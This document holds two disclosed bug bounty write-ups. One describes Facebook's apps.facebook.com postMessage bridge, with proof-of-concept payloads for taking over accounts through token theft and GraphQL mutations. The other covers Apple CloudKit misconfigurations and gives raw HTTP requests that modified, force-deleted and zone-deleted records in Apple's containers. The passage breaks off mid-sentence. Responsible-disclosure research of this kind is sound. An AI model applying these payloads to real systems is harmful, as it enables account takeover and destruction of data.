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  1. Summery Facebook allowed online games owners to host their games/applications in apps.facebook.com for many years now. The idea and technology behind it was that the game ( Flash or HTML5 based) would be hosted in the owner website and later the website page hosting it should be shown to the Facebook user in apps.facebook.com inside a controlled iframe. Since the game is not hosted in Facebook and for best user experience like keeping score and profile data, Facebook had to establish a communication channel with the game owner to verify the identity of the Facebook user for example. This was ensured by using cross windows communication/messaging between apps.facebook.com and the game website inside the iframe. In this blog post, i’ll be discussing multiple vulnerabilities i found in this implementation. Vulnerabilities potential These bugs were found after careful auditing of the client-side code inside apps.facebook.com responsible of verifying what’s coming through this channel. The bugs explained below (and others) allowed me to takeover any Facebook account if the user decided to visit my game page inside apps.facebook.com. The severity of these bugs is high since these were present for years and billions of user and their information could have been compromised easily since this was served from inside Facebook. Facebook confirmed they didn’t see any indicators of previous abuse or exploitation of these bugs. For Researchers Before explaining the actual bugs below, i tried to show the way i decomposed the code and a simplified path to track the flow of the message data and how its components will be used. I probably didn’t left much to dig but i hope the information shared could help you in your research. If you are only interested in the bugs themselves then jump to each bug section part. Description So far we know that the game page being served inside an iframe in apps.facebook.com is communicating with the parent window to ask Facebook to do some actions. Among the requested actions , for example , is to show a dialog to the user that would allow him to confirm the usage of the Facebook application owned by the game developers which would help me to identify you and get some information from an access token that they’ll receive if the user decided to user the application. The script responsible of receiving the cross window messages, interpreting them and understanding the action demanded is below ( only necessary parts are shown and as they were before the bugs were fixed ) : __d("XdArbiter", ... handleMessage: function(a, b, e) { d("Log").debug("XdArbiter at " + (window.name != null && window.name !== "" ? window.name : window == top ? "top" : "[no name]") + " handleMessage " + JSON.stringify(a)); if (typeof a === "string" && /^FB_RPC:/.test(a)) { k.enqueue([a.substring(7), { origin: b, source: e || i[h] }]); ... send: function(a, b, e) { var f = e in i ? e : h; a = typeof a === "string" ? a : c("QueryString").encode(a); b = b; try { d("SecurePostMessage").sendMessageToSpecificOrigin(b, a, e) } catch (a) { d("Log").error("XdArbiter: Proxy for %s not available, page might have been navigated: %s", f, a.message), delete i[f] } return !0 } ... window.addEventListener("message", function(a) { if (a.data.xdArbiterSyn) d("SecurePostMessage").sendMessageAllowAnyOrigin_UNSAFE(a.source, { xdArbiterAck: !0 }); else if (a.data.xdArbiterRegister) { var b = l.register(a.source, a.data.xdProxyName, a.data.origin, a.origin); d("SecurePostMessage").sendMessageAllowAnyOrigin_UNSAFE(a.source, { xdArbiterRegisterAck: b }) } else a.data.xdArbiterHandleMessage && l.handleMessage(a.data.message, a.data.origin, a.source) }), 98); __d("JSONRPC", ... c.read = function(a, c) { ... e = this.local[a.method]; try { e = e.apply(c || null, a.params); typeof e !== "undefined" && g("result", e) ... e.exports = a }), null); __d("PlatformAppController", ... function f(a, b, e) { ... c("PlatformDialogClient").async(f, a, function(d) { ... b(d) }); }... t.local.showDialog = f; ... t = new(c("JSONRPC"))(function(a, b) { var d = b.origin || k; b = b.source; if (b == null) { var e = c("ge")(j); b = e.contentWindow } c("XdArbiter").send("FB_RPC:" + a, b, d) } ... }), null); __d("PlatformDialogClient", ... function async(a, b, e) { var f = c("guid")(), g = b.state; b.state = f; b.redirect_uri = new(c("URI"))("/dialog/return/arbiter").setSubdomain("www").setFragment(c("QueryString").encode({ origin: b.redirect_uri })).getQualifiedURI().toString(); b.display = "async"; j[f] = { callback: e || function() {}, state: g }; e = "POST"; d("AsyncDialog").send(new(c("AsyncRequest"))(this.getURI(a, b)).setMethod(e).setReadOnly(!0).setAbortHandler(k(f)).setErrorHandler(l(f))) } ... function getURI(a, b) { if (b.version) { var d = new(c("URI"))("/" + b.version + "/dialog/" + a); delete b.version; return d.addQueryData(b) } return c("PlatformVersioning").versionAwareURI(new(c("URI"))("/dialog/" + a).addQueryData(b)) } }), 98); To simplify the code for you to understand the flow in case someone decides to dig more into it and looks for more bugs : Iframe sends message to parent => Message event dispatched in XdArbiter => Message handler function passes data to handleMessage function => “enqueue” function passes to JSONRPC => JSONRPC.read calls this.local.showDialog function in PlatformAppController => function checks message and if all valid, call PlatformDialogClient => PlatformDialogClient.async sends a POST request to apps.facebook.com/dialog/oauth , returned access_token would be passed to XdArbiter.send function ( few steps were skipped ) => XdArbiter.send would send a cross window message to the iframe window => Event dispatched in iframe window containing Facebook user access_token Below an example of a simple code to construct the message to be sent to apps.facebook.com from the iframe, a similar one would be send from any game page using the Facebook Javascript SDK but with more unnecessary parts: msg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","redirect_uri":"https://ysamm.com/callback","app_id":"APP_ID","client_id":"APP_ID","response_type":"token"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + msg , origin: IFRAME_ORIGIN} window.parent.postMessage(fullmsg,"*"); Interested parts to manipulate are : – IFRAME_ORIGIN, which is the one to be used in the redirect_uri parameter send with the POST request to apps.facebook.com/dialog/oauth to be verified server-side that it’s a domain owned by the application requesting an access_token, then would be used as targetOrigin in postMessage to send a cross window message to the iframe with the access_token – Keys and values of the object inside params , there are the parameters to be appended to apps.facebook.com/dialog/oauth. Most interesting ones are redirect_uri ( which can replace IFRAME_ORIGIN in the POST request in some cases ) and APP_ID Attacks vectors/scenarios What we’ll do here is to try to instead of requesting an access token for the game application we own, we’ll try to get one of a Facebook first party application like Instagram. What’s holding us back is although we control the IFRAME_ORIGIN and APP_ID which we can set to match the Instagram application as www.instagram.com and 124024574287414, later the message sent to the iframe containing the first party access token would have a targetOrigin in postMessage as www.instagram.com which is not our window origin. Facebook did a good job protecting against these attacks ( i’ll argue though to why not using the origin from the event message received and matching app_id to the hosted game instead of giving us total freedom which could have prevented all these bugs ), but apparently they left some weaknesses that could have been exploited for many years. Bug 1: Parameter Pollution, it was checked server-side and we definitely should trust it This bug occurs due to the fact that the POST request to https://apps.facebook.com/dialog/oauth when constructed from the received message from the iframe, could contain user controlled parameters. All parameters are checked in the client-side ( PlatformAppController, showDialog method and ,PlatformDialogClient.async method) and duplicate parameters will be removed in PlatformAppController , also AsyncRequest module seems to be doing some filtering ( removing parameters that already exist but brackets were appended to it ). However due to some missing checking in the server-side, a parameter name set to PARAM[random would replace a previously set parameter PARAM ; for example redirect_uri[0 parameter value would replace redirect_uri. We can abuse this as follow : 1) Set APP_ID to be the Instagram application id. 2) The redirect_uri will be constructed in PlatformDialogClient.async (Line 72 ) using IFRAME_ORIGIN ( will end up https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com ) , which would be sent matching our iframe window origin but won’t be used at all as explained below. 3) Set redirect_uri[0 in params as an additional parameter ( order matters so it must be after redirect_uri ) to be https://www.instagram.com/accounts/signup/ which is a valid redirect_uri for the Instagram applicaiton. The URL of the POST request end up being something like this: https://apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=https://attacker.com&app_id=124024574287414&client_id=124024574287414&response_type=token&redirect_uri[0=https://www.instagram.com/accounts/signup/ The request would end up being successful and returning a first party access token since redirect_uri[0 replaces redirect_uri and it’s a valid redirect_uri. In the client side though, the logic is if an access_token was received it means that the origin used to construct the redirect_uri did work with the app_id and for that it should trust it and use to send the message to the iframe, behind the scenes though redirect_uri[0 was used and not redirect_uri ( Cool right?) Proof of concept: xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","redirect_uri":"https://attacker.com/callback","app_id":"124024574287414","client_id":"124024574287414","response_type":"token","redirect_uri[0":"https://www.instagram.com/accounts/signup/"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg , origin: "https://attacker.com"} window.parent.postMessage(fullmsg,"*"); Bug 2: Why bothering, Origin is undefined The main problem for this one is that /dialog/oauth endpoint would accept https://www.facebook.com/dialog/return/arbiter as a valid redirect_uri ( without a valid origin in the fragment part ) for third-party applications and some first-party ones. The second problem is that this behaviour to occur ( no origin in the fragment part ), the message sent from the iframe to apps.facebook.com should not contain a.data.origin ( IFRAME_ORIGIN is undefined ) , however this same value would be used later to send a cross window message to the iframe, if null or undefined is used, the message won’t be received. Likely, i noticed that JSONRPC function would always receive a not null origin of the postMessage ( Line 55 ) . Since b.origin is undefined or null, k would be chosen. k could be set by the attacker by first registering a valid origin via c(“Arbiter”).subscribe(“XdArbiter/register”) which could be informed if our message had xdArbiterRegister and a specified origin . Before “k” variable is set, the supplied origin would be checked first if it belongs to the attacker application using “/platform/app_owned_url_check/” endpoint. This is wrong and the second problem occurs here since we can’t ensure that the user in the next cross origin message sent from the iframe would supply the same APP_ID. Not all first-party applications are vulnerable to this though. I used the Facebook Watch for Android application or Portal to get a first party access_token. The URL of the POST request would be something like this: https://apps.facebook.com/dialog/oauth?state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter&app_id=1348564698517390&client_id=1348564698517390&response_type=token Proof Of Concept window.parent.postMessage({xdArbiterRegister:true,origin:"https://attacker.com"},"*") xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","app_id":"1348564698517390","client_id":"1348564698517390","response_type":"token"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg} window.parent.postMessage(fullmsg,"*"); Bug 3: Total Chaos, version can’t be harmful This bug one occurs in PlatformDialogClient.getURI function which is responsible of setting the API version before /dialog/oauth endpoint. This function didn’t check for double dots or added paths and directly constructed a URI object to be used later to send an XHR request ( Line 86 ). The version property in params passed in the cross window message sent to apps.facebook.com could be set to api/graphql/?doc_id=DOC_ID&variables=VAR# and would eventually lead to a POST request sent to the GraphQL endpoint with valid user CSRF token. DOC_ID and VAR could be set to an id of a GraphQL Mutation to add a phone number to the attacount, and the variables of this mutation. The URL of the POST request would be something like this: https://apps.facebook.com/api/graphql?doc_id=DOC_ID&variables=VAR&?/dialog/oauth&state=f36be3f648ddfb&display=async&redirect_uri=https://www.facebook.com/dialog/return/arbiter#origin=attacker&app_id=1348564698517390&client_id=1348564698517390&response_type=token Proof Of Concept xmsg = JSON.stringify({"jsonrpc":"2.0", "method":"showDialog", "id":1, "params":[{"method":"permissions.oauth","display":"async","client_id":"APP_ID","response_type":"token","version":"api/graphql?doc_id=DOC_ID&variables=VAR&"}]}) fullmsg = {xdArbiterHandleMessage:true,message:"FB_RPC:" + xmsg , origin: "https://attacker.com"} window.parent.postMessage(fullmsg,"*"); Timeline Aug 4, 2021— Report Sent  Aug 4, 2021—  Acknowledged by Facebook Aug 6, 2021— Fixed by Facebook Sep 2, 2021 — $42000 bounty awarded by Facebook. Aug 9, 2021— Report Sent  Aug 9, 2021—  Acknowledged by Facebook Aug 12, 2021— Fixed by Facebook Aug 31, 2021 — $42000 bounty awarded by Facebook. Aug 12, 2021— Report Sent  Aug 13, 2021—  Acknowledged by Facebook Aug 17, 2021— Fixed by Facebook Sep 2, 2021 — $42000 bounty awarded by Facebook. Source: https://ysamm.com/?p=708
    2 points
  2. TL;DR. CloudKit, the data storage framework by Apple, has various access controls. These access controls could be misconfigured, even by Apple themselves, which affected Apple’s own apps using CloudKit. This blog post explains in detail three bugs found in iCrowd+, Apple News and Apple Shortcuts with different criticality uncovered by Frans Rosen while hacking Cloudkit. All bugs were reported to and fixed by the Apple Security Bounty program. Intro Ever since the fantastic “We Hacked Apple for 3 Month” article by Ziot, Sam, Ben, Samuel and Tanner, I wanted to approach Apple myself, looking for bugs with my own mindset. The article they wrote is still one of the best inspirational posts I’ve ever read and it’s still a post I regularly go back to for more info. In the middle of February this year I had the ability to spend some time and I decided to go all in on hunting bugs on Apple. If you’ve been in and out of bug hunting you might recognize the same kind of feeling I had. I felt that I sucked, that I could not find anything interesting. Ben and the team had already found all the bugs, right? It took me three days, three days of fighting the imposter syndrome, feeling worthless and almost stressed by not getting anywhere. I was intercepting requests all over the place, modifying things cluelessly and expecting miracles. Miracles don’t work that way. On the third day, I started to connect the dots, realized how certain assets connected to other assets, and started to understand more how things worked. This is when some of the first bugs popped up, finally restoring my self-esteem a bit, making me more relaxed and focused going forward. I dug up an old jailbroken iPad I had, which allowed me to proxy all content through my laptop. I downloaded all Apple owned apps and started looking at the traffic. What is CloudKit? Quite early on I noticed that a lot of Apple’s own apps used a technology called CloudKit and you could say it is Apple’s equivalent to Google’s Firebase. It has a database storage that is possible to authenticate to and directly fetch and save records from the client itself. I started reading the CloudKit documentation and used the CloudKit Catalog tool and created my own container to play around with it. Before getting into the hacking of Cloudkit, here’s a short description of the structure of CloudKit, this is the 30 second explanation: You create a container with a name. Suggested format is reversed domain structure, like com.apple.xxx. All containers you create yourself will begin with iCloud. Inside the container you have two environments, Development and Production. Inside the environments you have three different scopes, Private, Shared and Public. Private is only accessible by your own user. Shared is used for data being shared between users and Public is accessible by anyone, some parts with a public API-token, and some with authentication (with some exceptions, I’ll get to that below). Inside each scope, you have different zones you can create. Default zone is called _defaultZone. Inside each zone, you have different record types that you can create yourself. Each record type can contain different record fields, these fields can save different types of data, like INT, BOOLEAN, TEXT, BINARY etc. Inside each zone you also have records. Each record is always connected to a record type. There are even more features to it of course, for example the ability to create indexes and security roles with permissions. For Private and Shared scopes, you always need to authenticate as yourself. For the Public scope, you can have the ability to both read and write to the scope without personal authentication. You can enable public tokens that give you access to the public scope, but with the combination of authenticating as your own user gives access to the Private and Shared scopes. It was quite complex to understand all different authentication flows, and security roles, and this made me curious. Could it be that this was not only complex for me to understand, but also for teams using it internally at Apple? I started investigating where it was being used and for what. Reconnaissance To be able to understand where the CloudKit service was used by Apple themselves, I started to see in what ways all different apps connected to it. By just proxying everything from the iPad, the browser and using all apps, I could gather a bunch of requests and responses. After looking it through I noticed that Apple used different ways to connect to CloudKit. The iCloud assets, like Notes and Photos on www.icloud.com used one API: POST /database/1/com.apple.notes/production/public/records/resolve?... Host: p55-ckdatabasews.icloud.com and the developer portal at icloud.developer.apple.com had a different API: POST /r/v4/user/iCloud.com.mycontainer.test/Production/public/records/query?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com A lot of iOS-apps used a third API at gateway.icloud.com. This API used headers to specify what container was being used. These requests were almost always using protobuf: POST /ckdatabase/api/client/record/save HTTP/1.1 Host: gateway.icloud.com:443 X-CloudKit-ContainerId: com.apple.siri.data Accept: application/x-protobuf Content-Type: application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true if you used the CloudKit Catalog to test CloudKit API, it would instead use api.apple-cloudkit.com: POST /database/1/iCloud.com.example.CloudKitCatalog/production/public/records/query?... Host: api.apple-cloudkit.com For CloudKit Catalog you needed an API-token for getting access to the public scope. When I tried connecting to the CloudKit containers I saw while intercepting the iOS-apps, I failed due to the lack of the API-token needed to complete the authentication flow. iCrowd+ When testing all the apps and subdomains of Apple, one website, made by Apple, was actually utilizing the api.apple-cloudkit.com with an API-token provided. Going to https://public.icrowd.apple.com/ I could see the containers being used in the Javascript-file: containers: [{ containerIdentifier:"iCloud.com.apple.phonemo", apiTokenAuth: { apiToken:"f260733f..." }, environment:"production" }, { containerIdentifier:"iCloud.com.apple.icrowd", apiTokenAuth: { apiToken:"b90c3b24..." }, environment:"production" }] It then made a request to fetch the current version of the iCrowd+ application, to show the version on the start page: I could also see in the requests made by the websites that it was querying the records of the database, and that the record type was called Updates: "records" : [ { "recordName" :"FD935FB2-A401-6F05-E9D8-631BBC2A68A1", "recordType" :"Updates", "fields" : { "name" : { "value" :"iCrowd", "type" :"STRING" }, "description" : { "value" :"Updated to support iOS 14 and Personalized Hey Siri project.", "type" :"STRING" }, "version" : { "value" :"2.16.3", "type" :"STRING" }, "required" : { "value" :1, "type" :"INT64" } }, Since I had the token, I could use the CloudKit Catalog to connect to the Container: https://cdn.apple-cloudkit.com/cloudkit-catalog/?container=iCloud.com.apple.phonemo&environment=production&apiToken=f260733f...#authentication Looking at the records of the Public scope, I could see the data the website was fetching to use the version-data for the button: I then tried to add my own record to the same zone: Which gave me a response: When I now accessed the same website again at: https://public.icrowd.apple.com/, this is what I saw: I then realized that I could modify the data of the website, made a report to Apple on the 17th of February and deleted my record quickly again. Here’s a video showing the proof of concept I sent: I now realized that there might be other bugs related to permissions and that the public scope was the most interesting one, since it was shared among all users. I continued the process of finding where CloudKit databases were being utilized. Apple’s response Apple responded and fixed the issue on the 25th of February by completely removing the usage of CloudKit from the website at https://public.icrowd.apple.com/. Apple News Apple News was not really accessible from Sweden, so I created a new Apple ID based in the United States to be able to use it. As soon as I got in, I noticed that all news was served using CloudKit, and all articles were served from the public scope. That made sense, since news content was the same for all users. I could also see that the Stock app on iOS also fetched from the same container: GET /ckdatabase/stocks/topstories/WHT4Rx3... HTTP/1.1 Host: gateway.icloud.com:443 X-CloudKit-ContainerId: com.apple.news.public X-CloudKit-DatabaseScope: Public X-CloudKit-BundleId: com.apple.stocks User-Agent: AppleNews/679 Version/3.1 X-MMe-Client-Info: <iPad5,4> <iPhone OS;14.2;18B92> <com.apple.newscore/6.1 (com.apple.stocks/3.1)> Using the CloudKit API through gateway.icloud.com was tricky though. All communication was made through protobuf. There is an awesome project called InflatableDonkey that tries to reverse engineer the iCloud backup process from iOS 9. Since that project was only focusing on fetching data, a lot of methods in the Protobuf was not fully reversed, so I had to bruteforce a bit to try to find the methods needed also for modifications, and since Protobuf is binary, I didn’t really need the proper names, since each property in the protobuf is enumerable due to how the format is designed: I spent way too much time on this, almost two days straight, but as soon as I found methods I could use, modification of records in the Public scope still needed authorization for my user, and I was never able to figure out how to generate a X-CloudKit-AuthToken for the proper scope, since I was mainly interested in the Private scope. But remember that I mentioned different APIs talked with CloudKit differently? I logged in to www.icloud.com and went to the Notes-app, which talked with CloudKit using p55-ckdatabasews.icloud.com: POST /database/1/com.apple.notes/production/private/records/query?clientBuildNumber=2104Project55&clientMasteringNumber=2104B31 HTTP/1.1 Host: p55-ckdatabasews.icloud.com I then changed the container from com.apple.notes to com.apple.news.public with the public scope instead. I also extracted one of the articles I could see using the app in the protobuf communication to gateway.icloud.com: POST /database/1/com.apple.news.public/production/public/records/lookup?clientBuildNumber=2102Hotfix38& clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: X-APPLE-WEB-ID=... { "records": { "recordName":"A-OQYAcObS_W_21xWarFxFQ" }, "zoneID": { "zoneName":"_defaultZone" } } And the response was: { "records" : [ { "recordName" :"A-OQYAcObS_W_21xWarFxFQ", "recordType" :"Article", "fields" : { "iAdKeywords" : { "value" : ["TGiSf6ByLEeqXjy5yjOiBJQ","TGiSr-hyLEeqXjy5yjOiBJQ","TdNFQ6jKmRsSURg96xf4Xiw" ], "type" :"STRING_LIST" }, "topicFlags_143455" : { "value" : [12,0 ], "type" :"INT64_LIST" ... I also verified that stock-data was present: { "records": { "recordName":"S-AAPL" }, "zoneID": { "zoneName":"_defaultZone" } } this gave me: { "records" : [ { "recordName" :"S-AAPL", "recordType" :"Stock", "fields" : { "stockEntityID" : { "value" :"EKaaFEbKHS32-pJMZGHyfNw", "type" :"STRING" }, "symbol" : { "value" :"AAPL", "type" :"STRING" }, "feedConfiguration_143441" : { "value" :"{\"feedID\":\"EKaaFEbKHS32-pJMZGHyfNw$en-US\"}", "type" :"STRING" }, Success! I now knew that I could talk with the com.apple.news.public-container using the authenticated API on p55-ckdatabasews.icloud.com. I had a different Apple ID set up as a News Publisher, so I could create article drafts and create a published channel to the Apple News app. I created a channel and an article and started testing calls to them. Since the Apple ID I used for making requests to the API, I knew that if I could make modifications to the content, I could modify any article or stock data. The Channel-ID I had was TtVkjIR3aTPKrWAykey3ANA. Making a lookup query: POST /database/1/com.apple.news.public/production/public/records/lookup?clientBuildNumber=2102Hotfix38&clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: X-APPLE-WEB-ID=... showed me my test channel: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "recordType" :"Tag", "fields" : { "relatedTopicTagIDsForOnboarding_143455" : { "value" : [ ], "type" :"STRING_LIST" }, "defaultSectionTagID" : { "value" :"T18PTnZkqQ0qgW33zGzxs8w", "type" :"STRING" }, ... "name" : { "value" :"moa oma", "type" :"STRING" }, With my iPad, I also verified by going to https://apple.news/TtVkjIR3aTPKrWAykey3ANA I could see my channel in the Apple News app. I then tried all the methods that was possible against records using records/modify, based on the CloudKit documentation: create, update, forceUpdate, replace, forceReplace, delete and forceDelete. On all methods, the response looked like this: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "reason" :"Operation not permitted", "serverErrorCode" :"ACCESS_DENIED" } ] } But, on forceDelete: POST /database/1/com.apple.news.public/production/public/records/modify?clientBuildNumber=2102Hotfix38&clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: ... { "numbersAsStrings":true, "operations": [ { "record": { "recordType":"Article", "recordChangeTag": "ok", "recordName":"TtVkjIR3aTPKrWAykey3ANA" }, "operationType":"forceDelete" } ], "zoneID": { "zoneName":"_defaultZone" } } The response said: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "deleted" :true } ] } I reloaded the channel in Apple News: This confirmed to me that I could delete any channel or article, including stock entries, in the container com.apple.news.public being used for the Stock and Apple News iOS-apps. This worked due to the fact that I could make authenticated calls to CloudKit from the API being used for the Notes-app on www.icloud.com and due to a misconfiguration of the records added in the com.apple.news.public-container. I made a proof of concept to Apple and sent it as a different report on the 17th of March. Apple’s response Apple replied with a fix in place on the 19th of March by modifying the permissions of the records added to com.apple.news.public, where even the forceDelete-call would respond with: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "reason" :"delete operation not allowed", "serverErrorCode" :"ACCESS_DENIED" } ] } I also notified Apple about more of their own containers still having the ability to delete content from, however, it wasn’t clear if those containers were actually using the Public scope at all. Shortcuts Another app that was using the Public scope of CloudKit was Shortcuts. With Apple Shortcuts you can create logical flows that can be launched automatically or manually which then triggers different actions across your apps on iOS-devices. These shortcuts can be shared with other people using iCloud-links which creates an ecosystem around them. There are websites dedicated to recommending and sharing these Shortcuts through iCloud-links. As mentioned above, there is a Shared scope in a CloudKit container. When you decide to share anything private, this scope is often used. You would get something called a Short GUID, that looks something like 0H1FzBMaF1yAC7qe8B2OIOCxx and it would be possible to access using https://www.icloud.com/share/[shortGUID]. However, Apple Shortcuts links works a bit differently. When you share a shortcut, a record with the record type SharedShortcut will be created in the Public scope. The Record name being used will then be formed as a GUID: EA15DF64-62FD-4733-A115-452A6D1D6AAF, the record name will then be formatted to a lowercase string without hyphens and end up as: https://www.icloud.com/shortcuts/ea15df6462fd4733a115452a6d1d6aaf which will be the URL you would share publicly. Accessing this URL would then make a call to: https://www.icloud.com/shortcuts/api/records/ea15df6462fd4733a115452a6d1d6aaf which would return the data from CloudKit: { "recordType":"SharedShortcut", "created": { "userRecordName":"_264f90fe4d6310292cb22dad934baed0", "deviceID":"9AB...", "timestamp":1540330094701 }, "recordChangeTag":"jnm8rnmw", "pluginFields": {}, "deleted":false, "recordName":"EA15DF64-62FD-4733-A115-452A6D1D6AAF", "modified": { "userRecordName":"_264f90fe4d6310292cb22dad934baed0", "deviceID":"9AB...", "timestamp":1540330094701 }, "fields": { "icon_glyph": { "type":"NUMBER_INT64", "value":59412 }, "icon": { "type":"ASSETID", "value": { "downloadURL":"..." This made me excited since I could already see a few attack scenarios. If I could modify other users’ shortcuts, that would be really bad. Also the same kind of issue as on Apple News, being able to delete someone else’s shortcut, would also not be great. The Public scope also contained the Shortcuts Gallery that was showing up in the app itself: So if that content could be modified that would be quite critical. The Shortcuts app itself used the protobuf API at gateway.icloud.com: POST /ckdatabase/api/client/record/save HTTP/1.1 Host: gateway.icloud.com X-CloudKit-ContainerId: com.apple.shortcuts X-CloudKit-BundleId: com.apple.shortcuts X-CloudKit-DatabaseScope: Public Content-Type: application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true User-Agent: CloudKit/962 (18B92) X-CloudKit-AuthToken: [MY-TOKEN] Since I had spent so much time modifying InflatableDonkey to try all methods, I could now also use the X-CloudKit-AuthToken from my interception to try to make authorized calls to modify records to the Public scope. However, all the methods that actually did modifications gave me permission errors: "CREATE operation not permitted* ck1w5bmtg" This made me realize that through the API at gateway.icloud.com, my X-CloudKit-AuthToken did not allow me to modify any records in the Public scope. I spent almost 5-6 hours trying to identify if there were any methods I did not get permission errors on but without any luck. Since I had already reported the bugs with Apple News, and Apple had already fixed those issues, when I tried the same API connection method I initially took from Notes on www.icloud.com: POST /database/1/com.apple.shortcuts/production/public/records HTTP/1.1 Host: p55-ckdatabasews.icloud.com that also failed, the container com.apple.shortcuts was not accessible with the authentication being used from www.icloud.com. But remember that I mentioned different APIs talked with CloudKit differently? I went to icloud.developer.apple.com and connected to my own container, took one of the requests and modified the container to com.apple.shortcuts: POST /r/v4/user/com.apple.shortcuts/Production/public/records/modify?team_id=9DCADDBE3F Host: p25-ckdatabasews.icloud.apple.com This worked! I could verify this by using the records/lookup and use one of the UUIDs in the protobuf content to one of the gallery banners from the iOS-app: POST /r/v4/user/com.apple.shortcuts/Production/public/records/lookup?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com Cookie: [MY COOKIES] { "records": [ { "recordName": "C377CA6A-07D3-4A8A-A85E-3ED27EE9592E" } ], "numbersAsStrings": true, "zoneID": { "zoneName": "_defaultZone" } } This gave me: { "records" : [ { "recordName" :"C377CA6A-07D3-4A8A-A85E-3ED27EE9592E", "recordType" :"GalleryBanner", "fields" : { "iphone3xImage" : { "value" : { ... Perfect! This was now my way to talk with the Shortcuts database, the CloudKit connection from the Developer portal for CloudKit allowed me to properly authenticate to the com.apple.shortcut-container. I could now start checking the permissions for the public records. The simplest way to do this was to add a Burp replace rule to replace my own container in any request data, iCloud.com.mycontainer.test, with the Shortcuts container com.apple.shortcuts: When writing stories of how bugs were found, it’s extremely hard to communicate how much time things take, how many attempts were needed to figure things out. And often, the explanation on what actually worked seems really obvious when presented afterwards. I started going through the endpoints from the CloudKit documentation as well as clicking around in the UX from the CloudKit Developer portal. Records in the public scope were not possible to modify or delete. Some of the record types I found in the public scope were indexable, which allowed you to query for them as lists, however, this was all public info anyway. For example, you could use records/query to get all gallery banners: { "query": { "recordType":"GalleryBanner", "sortBy": [] }, "zoneID": { "zoneName":"_defaultZone" } } But that was not an issue, since they were already listed in the app. I looked into subscriptions, which did not really work as expected in the public scope. I looked at the sharing options, but since shortcuts did not use Short GUID sharing, that was not really interesting either. (Z)one more thing… Zones were the last thing I tested. As I mentioned earlier, each scope has zones, and the default zone is called _defaultZone. What is interesting with the Public scope, is that the UX of the CloudKit Developer portal actually tells you that it doesn’t support adding new zones to the Public scope: However, if I made the call to com.apple.shortcuts to list all zones, I could see that they had indeed more zones in the Public scope than just the default one: I could also add new zones: POST /r/v4/user/com.apple.shortcuts/Production/public/zones/modify?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com { "operations": [ { "purge":true, "zone": { "atomic":true, "zoneID": { "zoneName":"test" } }, "operationType":"create" } ] } which responded with: { "zones": [ { "syncToken":"AQAAAAAAAAABf/////////+AfEbbUd5SC7kEWsQavq+k", "atomic":true, "zoneID": { "zoneType":"REGULAR_CUSTOM_ZONE", "zoneName":"test", "ownerRecordName":"_e059f5dc..." } } ] } but I could not see anything bad with it. I could delete my own zones, but that was about it. Those zones would never be used or interacted with by anyone else. The documentation for zones was limited: There were no other calls than create or delete. I could create a zone, but was there really any impact to this? I wasn’t sure. I signed in to the CloudKit Developer portal with my second Apple ID. I then tried to do the same calls to my first user’s container. { "zones" : [ { "zoneID" : { "zoneName" :"_defaultZone", "zoneType" :"DEFAULT_ZONE" }, "reason" :"Cannot delete all records from public default zone", "serverErrorCode" :"BAD_REQUEST" } ] } So deletion failed if I tried with a different user to my own container, as expected. It wasn’t possible to delete any container’s default zone. Could I do a delete call without actually deleting it, but confirming it in any other way? I did not see a way to do that. My assumption was that a deletion attempt would result in the error above. I decided to try deleting the metadata_zone: { "operations": [ { "purge":true, "zone": { "atomic":true, "zoneID": { "zoneType":"REGULAR_CUSTOM_ZONE", "zoneName":"metadata_zone" } }, "operationType":"delete" } ] } It replied with an error: { "zones" : [ { "zoneID" : { "zoneName" :"metadata_zone", "ownerRecordName" :"_2e80...", "zoneType" :"REGULAR_CUSTOM_ZONE" }, "reason" :"User updates to system zones are not allowed", "serverErrorCode" :"NOT_SUPPORTED_BY_ZONE" } ] } This made me sure that the creation of zones wasn’t really an issue. The delete call did not work on existing ones, and there was no impact on being able to create new ones. I also tried the delete call to _defaultZone since I was sure that the error I would see would be the one above: Cannot delete all records from public default zone. At 23 Mar 2021 20:35:46 GMT I made the following call: POST /r/v4/user/com.apple.shortcuts/Production/public/zones/modify?team_id=9DCADDBE3F HTTP/1.1 Host: p25-ckdatabasews.icloud.apple.com { "operations": [ { "purge": true, "zone": { "atomic": true, "zoneID": { "zoneName": "_defaultZone" } }, "operationType": "delete" } ] } it responded with: { "zones" : [ { "zoneID" : { "zoneName" : "_defaultZone", "zoneType" : "DEFAULT_ZONE" }, "deleted" : true } ] } Shit. I did a zones/list again: { "zones" : [ { "zoneID" : { "zoneName" : "_defaultZone", "ownerRecordName" : "_2e805...", "zoneType" : "DEFAULT_ZONE" }, "atomic" : true }, { "zoneID" : { "zoneName" : "metadata_zone", "ownerRecordName" : "_2e805...", "zoneType" : "REGULAR_CUSTOM_ZONE" }, "atomic" : true } ] } Good, it wasn’t really deleted. I realized that 